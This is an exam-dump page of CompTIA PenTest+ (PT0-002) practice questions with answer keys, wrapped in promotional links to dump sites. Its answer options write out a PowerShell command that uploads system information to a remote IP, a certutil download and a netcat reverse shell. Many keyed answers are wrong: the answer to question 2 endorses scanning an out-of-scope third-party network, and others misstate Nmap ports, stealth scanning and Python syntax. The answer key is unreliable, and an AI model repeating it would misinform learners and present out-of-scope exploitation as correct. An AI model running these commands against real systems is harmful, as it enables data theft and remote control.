2022 New PT0-002 Exam Dumps with PDF and VCE Free: https://www.2passeasy.com/dumps/PT0-002/

It is impossible to pass the CompTIA PT0-002 exam without any help in the short term. Come to Actualtests soon and find the most advanced, correct and guaranteed CompTIA PT0-002 practice questions. You will get surprising results with our up-to-date CompTIA PenTest+ Certification Exam practice guides.

CompTIA PT0-002 Free Dumps Questions Online, Read and Test Now.

NEW QUESTION 1
A penetration tester ran a ping -A command during an unknown environment test, and it returned a 128 TTL packet. Which of the following OSs would MOST likely return a packet of this type?

  • A. Windows
  • B. Apple
  • C. Linux
  • D. Android

Answer: A

NEW QUESTION 2
A penetration tester has gained access to a network device that has a previously unknown IP range on an interface. Further research determines this is an always-on VPN tunnel to a third-party supplier.
Which of the following is the BEST action for the penetration tester to take?

  • A. Utilize the tunnel as a means of pivoting to other internal devices.
  • B. Disregard the IP range, as it is out of scope.
  • C. Stop the assessment and inform the emergency contact.
  • D. Scan the IP range for additional systems to exploit.

Answer: D

NEW QUESTION 3
A new security firm is onboarding its first client. The client only allowed testing over the weekend and needed the results Monday morning. However, the assessment team was not able to access the environment as expected until Monday. Which of the following should the security company have acquired BEFORE the start of the assessment?

  • A. A signed statement of work
  • B. The correct user accounts and associated passwords
  • C. The expected time frame of the assessment
  • D. The proper emergency contacts for the client

Answer: B

NEW QUESTION 4
A penetration tester has obtained a low-privilege shell on a Windows server with a default configuration and now wants to explore the ability to exploit misconfigured service permissions. Which of the following commands would help the tester START this process?

  • A. certutil -urlcache -split -f http://192.168.2.124/windows-binaries/accesschk64.exe
  • B. powershell (New-Object System.Net.WebClient).UploadFile('http://192.168.2.124/upload.php', 'systeminfo.txt')
  • C. schtasks /query /fo LIST /v | find /I "Next Run Time:"
  • D. wget http://192.168.2.124/windows-binaries/accesschk64.exe -O accesschk64.exe

Answer: B

NEW QUESTION 5
A penetration tester would like to obtain FTP credentials by deploying a workstation as an on-path attack between the target and the server that has the FTP protocol. Which of the following methods would be the BEST to accomplish this objective?

  • A. Wait for the next login and perform a downgrade attack on the server.
  • B. Capture traffic using Wireshark.
  • C. Perform a brute-force attack over the server.
  • D. Use an FTP exploit against the server.

Answer: B

NEW QUESTION 6
A security company has been contracted to perform a scoped insider-threat assessment to try to gain access to the human resources server that houses PII and salary data. The penetration testers have been given an internal network starting position.
Which of the following actions, if performed, would be ethical within the scope of the assessment?

  • A. Exploiting a configuration weakness in the SQL database
  • B. Intercepting outbound TLS traffic
  • C. Gaining access to hosts by injecting malware into the enterprise-wide update server
  • D. Leveraging a vulnerability on the internal CA to issue fraudulent client certificates
  • E. Establishing and maintaining persistence on the domain controller

Answer: B

NEW QUESTION 7
Which of the following describe the GREATEST concerns about using third-party open-source libraries in application code? (Choose two.)

  • A. The libraries may be vulnerable
  • B. The licensing of software is ambiguous
  • C. The libraries’ code bases could be read by anyone
  • D. The provenance of code is unknown
  • E. The libraries may be unsupported
  • F. The libraries may break the application

Answer: AC

NEW QUESTION 8
A penetration tester recently completed a review of the security of a core network device within a corporate environment. The key findings are as follows:
• The following request was intercepted going to the network device:
    GET /login HTTP/1.1
    Host: 10.50.100.16
    User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:31.0) Gecko/20100101 Firefox/31.0
    Accept-Language: en-US,en;q=0.5
    Connection: keep-alive
    Authorization: Basic WU9VUilOQU1FOnNlY3JldHBhc3N3b3jk
• Network management interfaces are available on the production network.
• An Nmap scan returned the following:
    [Exhibit: Nmap scan output, image not included]
Which of the following would be BEST to add to the recommendations section of the final report? (Choose two.)

  • A. Enforce enhanced password complexity requirements.
  • B. Disable or upgrade SSH daemon.
  • C. Disable HTTP/301 redirect configuration.
  • D. Create an out-of-band network for management.
  • E. Implement a better method for authentication.
  • F. Eliminate network management and control interfaces.

Answer: CE

NEW QUESTION 9
A penetration tester who is doing a security assessment discovers that a critical vulnerability is being actively exploited by cybercriminals. Which of the following should the tester do NEXT?

  • A. Reach out to the primary point of contact
  • B. Try to take down the attackers
  • C. Call law enforcement officials immediately
  • D. Collect the proper evidence and add to the final report

Answer: A

NEW QUESTION 10
A company conducted a simulated phishing attack by sending its employees emails that included a link to a site that mimicked the corporate SSO portal. Eighty percent of the employees who received the email clicked the link and provided their corporate credentials on the fake site. Which of the following recommendations would BEST address this situation?

  • A. Implement a recurring cybersecurity awareness education program for all users.
  • B. Implement multifactor authentication on all corporate applications.
  • C. Restrict employees from web navigation by defining a list of unapproved sites in the corporate proxy.
  • D. Implement an email security gateway to block spam and malware from email communications.

Answer: A

NEW QUESTION 11
A client has requested that the penetration test scan include the following UDP services: SNMP, NetBIOS, and DNS. Which of the following Nmap commands will perform the scan?

  • A. nmap -vv -sUV -p 53, 123-159 10.10.1.20/24 -oA udpscan
  • B. nmap -vv -sUV -p 53,123,161-162 10.10.1.20/24 -oA udpscan
  • C. nmap -vv -sUV -p 53,137-139,161-162 10.10.1.20/24 -oA udpscan
  • D. nmap -vv -sUV -p 53, 122-123, 160-161 10.10.1.20/24 -oA udpscan

Answer: B

NEW QUESTION 12
A penetration tester wants to scan a target network without being detected by the client’s IDS. Which of the following scans is MOST likely to avoid detection?

  • A. nmap -p0 -T0 -sS 192.168.1.10
  • B. nmap -sA -sV --host-timeout 60 192.168.1.10
  • C. nmap -f --badsum 192.168.1.10
  • D. nmap -A -n 192.168.1.10

Answer: B

NEW QUESTION 13
User credentials were captured from a database during an assessment and cracked using rainbow tables. Based on the ease of compromise, which of the following algorithms was MOST likely used to store the passwords in the database?

  • A. MD5
  • B. bcrypt
  • C. SHA-1
  • D. PBKDF2

Answer: A

NEW QUESTION 14
A penetration tester has obtained root access to a Linux-based file server and would like to maintain persistence after reboot. Which of the following techniques would BEST support this objective?

  • A. Create a one-shot systemd service to establish a reverse shell.
  • B. Obtain /etc/shadow and brute force the root password.
  • C. Run the nc -e /bin/sh <...> command.
  • D. Move laterally to create a user account on LDAP

Answer: A

Explanation:
https://hosakacorp.net/p/systemd-user.html

NEW QUESTION 15
Which of the following expressions in Python increase a variable val by one? (Choose two.)

  • A. val++
  • B. +val
  • C. val=(val+1)
  • D. ++val
  • E. val=val++
  • F. val+=1

Answer: DF

NEW QUESTION 16
A penetration tester is testing a web application that is hosted by a public cloud provider. The tester is able to query the provider’s metadata and get the credentials used by the instance to authenticate itself. Which of the following vulnerabilities has the tester exploited?

  • A. Cross-site request forgery
  • B. Server-side request forgery
  • C. Remote file inclusion
  • D. Local file inclusion

Answer: B

NEW QUESTION 17
......

Thanks for reading the newest PT0-002 exam dumps! We recommend that you try the PREMIUM Dumpscollection.com PT0-002 dumps in VCE and PDF here: https://www.dumpscollection.net/dumps/PT0-002/ (110 Q&As Dumps)